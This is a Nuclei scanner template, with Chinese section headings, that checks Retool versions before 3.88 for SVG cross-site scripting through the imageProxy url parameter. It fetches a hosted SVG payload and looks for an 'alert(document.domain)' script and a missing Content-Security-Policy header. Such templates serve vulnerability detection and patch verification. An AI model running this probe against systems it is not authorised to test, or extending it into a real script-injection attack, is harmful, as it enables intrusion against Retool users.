漏洞描述
This template checks for SVG Cross-Site Scripting(XSS) vulnerability via the Image Proxy URL parameter in Retool.
retool-svg-xss: Retool < 3.88 - SVG Cross-Site Scripting
PoC代码[已公开]
id: retool-svg-xss
info:
name: Retool < 3.88 - SVG Cross-Site Scripting
author: iamnoooob,iamnoooob,pdresearch
severity: high
description: |
This template checks for SVG Cross-Site Scripting(XSS) vulnerability via the Image Proxy URL parameter in Retool.
reference:
- https://docs.retool.com/releases/edge/3.88#:~:text=Fixed%20an%20SVG%20XSS%20vulnerability%20by%20adding%20a%20CSP.%20(%2349381)
metadata:
verified: true
max-request: 1
fofa-query: body="x-retool"
tags: retool,xss
http:
- raw:
- |
GET /api/imageProxy?url=https://raw.githubusercontent.com/projectdiscovery/nuclei-templates/refs/heads/main/helpers/payloads/retool-xss.svg HTTP/1.1
Host: {{Hostname}}
matchers-condition: and
matchers:
- type: word
part: body
words:
- "alert(document.domain);"
- "<?xml version"
- '<script type="text/javascript">'
condition: and
- type: word
part: header
words:
- "Content-Security-Policy: default-src 'none';"
negative: true
- type: status
status:
- 200
# digest: 4a0a00473045022100eb45bca2eb093ab270b353270776dc96bd4bb004b81b71957503048fe2acb5540220628b1c65e19043fbebafbcc9b6f9c6ce6bb9b7202c06a25604de4acfae34c0b9:922c64590222798bb761d5b6d8e72950